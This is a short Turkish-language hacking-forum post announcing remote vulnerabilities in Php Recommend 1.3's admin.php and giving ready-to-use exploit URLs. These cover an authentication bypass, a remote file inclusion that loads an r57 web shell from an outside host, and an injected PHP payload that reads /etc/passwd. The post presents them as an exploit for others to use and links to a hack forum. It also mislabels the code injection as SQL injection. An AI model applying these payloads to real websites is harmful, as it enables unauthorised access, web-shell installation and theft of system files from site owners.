Php Recommend ’Admin.Php’

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DeepiMpaCt
    DeepiMpaCt's avatar
    Kayıt Tarihi: 10/Mayıs/2009
    Erkek
    Php Recommend  ’admin.php’ Çoklu Uzaktan Güvenlik açıkları

    Php Recommend 1.3 aşağıdaki uzak zayıflıkları eğilimli:

    - Bir kimlik doğrulama güvenlik açığı atlamak
    - Bir kod enjeksiyon açığı
    - Shell sokma açığı
    Hackerlar etkilenen uygulama veya enjekte ve kötü niyetli PHP kodu çalıştırmak sanaldoku süreci çerçevesinde yetkisiz erişim elde edilebilir.

    Php Recommend 1.3 savunmasızdır; diğer sürümleri de etkilenebilir.

    Altta vereceğim linklerle Script’in exploitidir.

    Kimlik doğrulama için atlama açığı:

    www.site.com/admin.php?submit=submit&form_admin_user=USERNAME&form_admin_pass=PASSWORD


    Shell sokma açığı :

    www.site.com/admin.php?submit=submit&form_include_template=http://site.com/r57.txt?

    SQL Injection açığı :

    www.site.com/admin.php?submit=submit&form_aula=’;readfile(’/etc/passwd’);’

    hack forum https://www.turkhacks.com
Toplam Hit: 2326 Toplam Mesaj: 1